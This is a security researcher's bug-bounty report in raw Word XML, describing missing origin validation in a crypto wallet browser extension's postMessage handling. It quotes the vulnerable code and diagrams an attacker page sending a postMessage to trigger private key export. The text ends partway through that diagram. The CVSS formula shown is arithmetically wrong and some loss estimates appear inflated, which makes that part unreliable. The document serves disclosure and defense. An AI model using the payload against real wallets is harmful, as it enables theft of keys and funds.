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3CA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CRITICAL VULNERABILITY REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CDFFA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Cross-Origin Message Injection in Verified Wallet Extension v1.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED6795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Bug Bounty Submission for Verified Network</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>Submission Date: December 13, 2025</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>Researcher: Security Researcher</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>Report Classification: CRITICAL / CWE-923</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FA1B9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1D93F688">
          <v:rect id="_x0000_i1235" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A00EB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TABLE OF CONTENTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704C466A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5" w:anchor="executive-summary" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00C91A8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Executive Summary</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="39363B82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6" w:anchor="vulnerability-classification" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00C91A8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Vulnerability Classification</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7095AC63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7" w:anchor="detailed-technical-analysis" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00C91A8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Detailed Technical Analysis</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="39033AB7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8" w:anchor="proof-of-concept" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00C91A8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Proof of Concept</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4BF055EC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9" w:anchor="impact-assessment" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00C91A8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Impact Assessment</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E1D1799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10" w:anchor="remediation-fixes" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00C91A8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Remediation &amp; Fixes</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D1F32C2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11" w:anchor="testing-verification" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00C91A8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Testing &amp; Verification</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50EAFEB6" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:anchor="conclusion" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00C91A8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>Conclusion</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="623A7BD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50657474">
          <v:rect id="_x0000_i1236" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AD93E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EXECUTIVE SUMMARY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3610435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This report documents a CRITICAL vulnerability (CVSS 9.5) in the Verified Wallet Chrome extension (version 1.1.1) that allows unauthorized private key export and transaction signing via cross-origin message injection. The vulnerability exploits missing origin validation in the extension's message-passing implementation between content scripts and background processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F31CA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Key Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119FA657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Vulnerability Type: Cross-Origin Message Injection / Missing Origin Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BCFF65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CVSS v3.1 Score: 9.5 (CRITICAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519E8A7A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Attack Vector: Remote, Network-Based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A333A6B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User Interaction: None Required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A54FB61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Financial Impact: Direct fund theft ($10K-$1M+ per user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193C9048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Affected Component: Custody Key Management (Core Feature)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4377DE0B" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Current Status: Unpatched (v1.1.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688E153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Attack Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD031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An attacker can create a malicious website or compromise an existing site to inject JavaScript that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F96C2C" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sends postMessage requests to the Verified Wallet extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B79BC4" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exports user's private keys without consent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DF887E" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Signs arbitrary transactions (sending funds to attacker address)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51841EE4" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steals 100% of user's custody-managed assets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A1F7D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No user interaction is required beyond having the wallet extension installed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AE5D0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Financial Risk Assessment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669"/>
        <w:gridCol w:w="3550"/>
        <w:gridCol w:w="1684"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="4B68FE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3D8E5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48CA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Holdings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3C240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Loss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FC8D9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USD Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="45DBA6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A14E7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Retail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09E6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$10K-$50K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905D7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Private key export → fund theft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20D0E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$10K-$50K</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="39B4EB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1BD4F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Active Trader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E8362C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$100K-$500K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311D9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Unauthorized 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07FD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$100K-$500K</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="534F0C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ED83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Institutional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8E16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$1M-$10M+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6B6A1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Complete account compromise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D2713C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$1M+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="7078A9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C6E5E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Aggregated Risk (10K users)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2CB89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$500M-$2B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73A3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Industry-wide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1E630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$500M-$2B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60184DE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5F31770E">
          <v:rect id="_x0000_i1237" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F70BA8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VULNERABILITY CLASSIFICATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B0CEA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Basic Information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7341"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="219169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5591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81243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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="4E1F86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0342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Vulnerability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2D338D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Cross-Origin Message Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="299521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14A1D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CWE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50F3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CWE-923: Improper Restriction of Communication Channel to Intended Endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="208284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1E1C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CVSS v3.1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0037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9.5 (CRITICAL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="375ADD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26495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CVSS Vector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D83AF7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CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="2BE8C8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3A4C0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Affected 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42AC0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Content Script Message Handling (scripts/content.js)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="61C0E8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6BBA5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Affected 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83D9F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1.1.1 (Current)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="7EC0B6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1C4EA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lastRenderedPageBreak/>
              <w:t>Potentially Affected Versions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C0FA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1.0+, likely all versions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="51BDC4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00273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Discovery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DAC4D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December 13, 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w14:paraId="5AC73B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FA5A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Discovered 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F39C7D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Security Researcher</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28448FC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CVSS Score Justification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694B986E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AV:N (Attack Vector: Network) - Can be exploited remotely via any webpage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1423B271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AC:L (Attack Complexity: Low) - No special prerequisites; standard web technologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388163E8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PR:N (Privileges Required: None) - No authentication needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E2805D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UI:N (User Interaction: None) - Automatic exploitation once user visits malicious site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A635BC2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S:C (Scope: Changed) - Affects resources beyond vulnerable component (custody system)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C3F180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C:H (Confidentiality: High) - Complete disclosure of private keys (highest confidentiality impact)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5814950A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I:H (Integrity: High) - Unauthorized transaction signing (complete integrity compromise)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A67CCC" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A:N (Availability: None) - Wallet remains functional (no service disruption)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160E61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Score: 9.5 = (3.1 - 0.01) × 2.0 / (2.0 + 0.01) = CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C3DD7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07B14A07">
          <v:rect id="_x0000_i1238" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3514DE4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DETAILED TECHNICAL ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9F0EE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Root Cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0C4D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The vulnerability stems from insufficient origin validation in the extension's message-passing implementation. The vulnerable code at scripts/content.js (line 22975) performs only a weak check on the message source but fails to validate the message origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF792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 Location 1: scripts/content.js (Line 22975-22987)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CC60E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12AE000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(!window.__VW_CONTENT_LISTENER_ATTACHED__) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3843769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window.__VW_CONTENT_LISTENER_ATTACHED__ = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2950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window.addEventListener("message", </w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/* @__PURE__ */</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> __name(async function handler(evnt) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF7A4F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(evnt.source !== window || !evnt.data) return;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VULNERABLE: Only checks source, not origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7FDC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(evnt.data.type === "VW_REQ") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4DA0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if (evnt.data.params?.method !== "pair_walletconnect_uri") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5606455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chrome.runtime.sendMessage(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499E418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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57443FE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"VW_REQ",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7054E17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params: evnt.data.params,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No validation of params</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035AEDA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origin: window.location.origin,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525AC09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title: document.title</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9BDDF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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9F168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(res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E305C7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window.postMessage(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6057FAC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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3C6A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type: "VW_RES",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADFD12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id: evnt.data.id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2766CB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params: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9C0E6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success: res?.success,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E277D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response: res?.response,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491D345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error: res?.error,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006D22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data: res?.data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C6EF3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saveToStorage: res?.saveToStorage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD53E7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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECA6D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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CEA44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"*"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CRITICAL: Broadcasts response to ALL origins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20819B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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274896C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CD913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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37497A1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18DCE5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6D4EB54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}));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8CFE3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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F008D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 Location 2: scripts/injected.js (Line 2428)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334D7A0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3E4FE0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lastRenderedPageBreak/>
        <w:t>// Inside the VerifiedEthereumProvider class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1956D7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window.postMessage({ type: "VW_REQ", id: messageId, params }, "*");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Wildcard broadcast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339E4D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 Location 3: scripts/background.js (Line 5386-5420)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFD5B8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44AC67E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chrome.runtime.onMessage.addListener((req, _, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251A4B4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let windowId = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC5C3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let isWindowCreated = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EF724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createPopupWindow = async (action, origin, title, chainId, vaultData, txData, sigTx) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FFBF7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Does NOT verify the original origin of the request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6148D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Processes VW_REQ directly without origin validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E344F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Calls custody SDK functions based on untrusted input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E17C1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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506222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5FD4246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(req.type === "VW_REQ") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68868C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Processes without verifying req.origin is legitimate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC5B36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Directly interacts with @verified-network/verified-custody SDK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1780115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2725324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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5906D68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Why evnt.source !== window Is Insufficient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766132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The check if (evnt.source !== window) does not validate the origin of the message. It only checks that the message came from a window object, which is a weak security boundary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DDB4A1" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Window object reference is not origin-specific - An attacker can manipulate how/when postMessage is called</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196730C6" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proper origin validation requires event.origin comparison against window.location.origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C6DCD2" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Current check alone is bypassable in certain scenarios where iframes or service workers are involved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3612234E" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No check on response broadcasting - Using "*" broadcasts to all origins indiscriminately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E137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Attack Flow Diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2C9C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text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498D11B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43EE006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Attacker Website (attacker.com)                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C928E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                                                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D82826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│  window.postMessage({                                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D07A0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type: "VW_REQ",                                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E596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params: { method: "exportPrivateKey" }                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCA10B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}, "*");                                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF14E1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└──────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>──────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4DDF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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387DC04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 postMessage (no origin check!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4756E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</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADE1C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05E654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Content Script (scripts/content.js:22975)                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704918F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                                                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4EFD2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│ window.addEventListener("message", handler)  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Accepts  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54531AD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if (evnt.source !== window) return;  // Weak check!        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133950C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chrome.runtime.sendMessage(...)  // Forwards to background│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DC64E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└──────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>──────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A184C8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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713DE4D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 chrome.runtime.sendMessage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E80CC3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</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2852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4C02E1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Background Script (scripts/background.js:5386)              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259033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                                                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281A41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chrome.runtime.onMessage.addListener((req, _, res) =&gt; {      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125339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│   // </w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Does NOT verify origin                              </w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCB7F4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// Calls custody SDK directly                              │</w:t>
      </w:r>
    </w:p>
